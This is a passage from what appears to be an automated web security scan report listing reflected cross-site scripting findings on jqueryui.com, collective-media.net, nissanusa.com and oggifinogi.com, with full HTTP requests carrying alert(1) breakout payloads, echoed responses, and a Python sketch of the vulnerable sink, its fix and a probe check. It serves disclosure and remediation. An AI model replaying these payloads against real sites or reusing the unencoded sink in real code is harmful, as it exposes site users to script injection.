The value of the offsetTopShadow request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload 6de88"><script>alert(1)</script>154c7b1f564 was submitted in the offsetTopShadow parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px6de88"><script>alert(1)</script>154c7b1f564&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px6de88"><script>alert(1)</script>154c7b1f564&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.639. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 112ed"><script>alert(1)</script>7d0c4e6853f was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30112ed"><script>alert(1)</script>7d0c4e6853f&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30112ed"><script>alert(1)</script>7d0c4e6853f&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

4.640. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b44f"><script>alert(1)</script>4183a5e6bd3 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=305b44f"><script>alert(1)</script>4183a5e6bd3&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=305b44f"><script>alert(1)</script>4183a5e6bd3&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.641. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3000"><script>alert(1)</script>0be6e99973d was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb3000"><script>alert(1)</script>0be6e99973d&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb3000"><script>alert(1)</script>0be6e99973d&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...
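The four ThemeRoller findings above (4.638 to 4.641) share one sink: the query string is echoed, unencoded, into the double-quoted href of a <link ... type="text/css"> tag, so a " in any parameter value closes the attribute and a > closes the tag. The Python below is an added example, not jqueryui.com's code: the report shows only the response, so the way the href is assembled and the /themeroller/theme.css path are assumptions. It reproduces the faulty concatenation, the hardened form that URL-encodes the query and then HTML-attribute-encodes the finished value, and the scanner's own check, a payload wrapped in random markers that is reflected unencoded only by the vulnerable renderer.

```python
import html
import secrets
from typing import Callable
from urllib.parse import urlencode

# Constructed stand-in for the ThemeRoller query string; the real request
# carries about fifty parameters, three are enough for the demonstration.
BASE_PARAMS = {
    "thicknessShadow": "8px",
    "offsetTopShadow": "-8px",
    "offsetLeftShadow": "-8px",
}

# Hypothetical stylesheet endpoint; the real path is not shown in the report.
CSS_PATH = "/themeroller/theme.css"


def render_link_vulnerable(params: dict) -> str:
    """Assumed reconstruction of the sink in 4.638-4.641: parameter values
    are joined verbatim and spliced into a double-quoted href."""
    raw_query = "&".join(f"{k}={v}" for k, v in params.items())
    return f'<link href="{CSS_PATH}?{raw_query}" type="text/css" media="all" />'


def render_link_hardened(params: dict) -> str:
    """Two independent layers. urlencode() turns '"', '<' and '>' into
    %22, %3C and %3E, so they can never be parsed as markup; html.escape()
    then encodes the finished attribute value ('&' -> '&amp;', '"' -> '&quot;')
    so even a value that slipped past the first layer stays inside the quotes."""
    href = f"{CSS_PATH}?{urlencode(params)}"
    return f'<link href="{html.escape(href, quote=True)}" type="text/css" media="all" />'


def make_probe() -> tuple[str, str, str]:
    """Scanner-style probe: random hex markers bracket the payload so a
    verbatim reflection cannot be confused with the page's own markup."""
    return secrets.token_hex(3)[:5], '"><script>alert(1)</script>', secrets.token_hex(6)[:11]


def reflected_unencoded(response: str, prefix: str, payload: str, suffix: str) -> bool:
    """True when marker+payload+marker appears byte-for-byte in the response,
    i.e. no encoding touched the quote and the angle brackets."""
    return (prefix + payload + suffix) in response


def probe(render: Callable[[dict], str], param: str = "offsetTopShadow") -> bool:
    """Append the probe to one parameter's normal value, as the report does,
    and report whether the renderer echoes it unencoded."""
    prefix, payload, suffix = make_probe()
    params = dict(BASE_PARAMS)
    params[param] = params.get(param, "") + prefix + payload + suffix
    return reflected_unencoded(render(params), prefix, payload, suffix)


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_link_vulnerable), ("hardened", render_link_hardened)):
        print(f"{name}: reflected unencoded = {probe(renderer)}")
```

The same attribute-context encoding is the fix for the other double-quoted-attribute findings on this page (4.646, 4.648 to 4.650, 4.652); only the first layer changes when the value is not a URL.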

4.642. http://k.collective-media.net/cmadj/cm.quadbostonherald/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.quadbostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf40'-alert(1)-'81a8eb9bf10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that this response, like those of the three collective-media.net findings that follow, is served as application/x-javascript and emits its markup as a JavaScript string (<scr'+'ipt ...>), so the injected code runs in the origin of whichever page loads this URL as a script (here bostonherald.com, per the Referer); a browser that navigates to the URL directly will only render it if it sniffs the response as HTML.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.quadbostonherald4bf40'-alert(1)-'81a8eb9bf10/;sz=300x250;net=cm;ord=[timestamp];env=ifr;ord1=901204;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:44:29 GMT
Connection: close
Content-Length: 8181

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-18380300_1296265469","http://ib.adnxs.com/ptj?member=311&inv_code=cm.quadbostonherald4bf40'-alert(1)-'81a8eb9bf10&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald4bf40%27-alert%281%29-%2781a8eb9bf10%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-18380
...[SNIP]...

4.643. http://k.collective-media.net/cmadj/cm.quadbostonherald/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.quadbostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a0a3'-alert(1)-'5a9d9390595 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.quadbostonherald/;sz=9a0a3'-alert(1)-'5a9d9390595 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8085
Date: Sat, 29 Jan 2011 04:51:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-40496331_1296276716","http://ib.adnxs.com/ptj?member=311&inv_code=cm.quadbostonherald&size=9a0a3'-alert(1)-'5a9d9390595&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-40496331_1296276716%2C11d765b6a10b1b3%2Cnone%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm
...[SNIP]...

4.644. http://k.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_bostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 829d0'-alert(1)-'5bab6147ab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_bostonherald829d0'-alert(1)-'5bab6147ab2/;sz=300x250;net=cm;ord=0.3579352851957083;env=ifr;ord1=199062;cmpgurl=http%253A//ad.afy11.net/ad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:44:19 GMT
Connection: close
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:44:19 GMT
Set-Cookie: rdst7=1; domain=collective-media.net; path=/; expires=Sun, 29-May-2011 01:44:19 GMT
Set-Cookie: rdst8=1; domain=collective-media.net; path=/; expires=Sun, 29-May-2011 01:44:19 GMT
Set-Cookie: dp1=1; domain=collective-media.net; path=/; expires=Sun, 29-May-2011 01:44:19 GMT
Content-Length: 8704

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-53602374_1296265459","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald829d0'-alert(1)-'5bab6147ab2&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26r
...[SNIP]...

4.645. http://k.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_bostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 186e2'-alert(1)-'9de2a10529b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_bostonherald/;sz=186e2'-alert(1)-'9de2a10529b HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 8085
Date: Sat, 29 Jan 2011 04:51:50 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-66675716_1296276710","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald&size=186e2'-alert(1)-'9de2a10529b&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-66675716_1296276710%2C11d765b6a10b1b3%2Cnone%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm
...[SNIP]...

4.646. http://local.nissanusa.com/zip.aspx [vehicle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The value of the vehicle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4e1"><script>alert(1)</script>e67eb90c86a was submitted in the vehicle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback1e4e1"><script>alert(1)</script>e67eb90c86a&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:39 GMT
Content-Length: 16017
Connection: close
Set-Cookie: PHPSESSID=t7cgpte7k894phrrjtaofv1dj7; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="vehicle" value="versa-hatchback1e4e1"><script>alert(1)</script>e67eb90c86a" />
...[SNIP]...

4.647. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx [vary parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://main.oggifinogi.com
Path:   /OggiPlayerService/PlayerProxy.aspx

Issue detail

The value of the vary request parameter is copied into the HTML document as plain text between tags. The payload 1e90e<img%20src%3da%20onerror%3dalert(1)>871ea2c5bb2 was submitted in the vary parameter. This input was echoed as 1e90e<img src=a onerror=alert(1)>871ea2c5bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler rather than a script element to introduce the JavaScript; such a payload also fires when the text is later inserted into the DOM through innerHTML, where an injected <script> element would not execute. Note that the response copies the value twice: URL-encoded inside the PlayerProxy.aspx URL, where it is harmless, and raw inside a quoted string, where it is not. Encoding at one sink does not protect the other.

Request

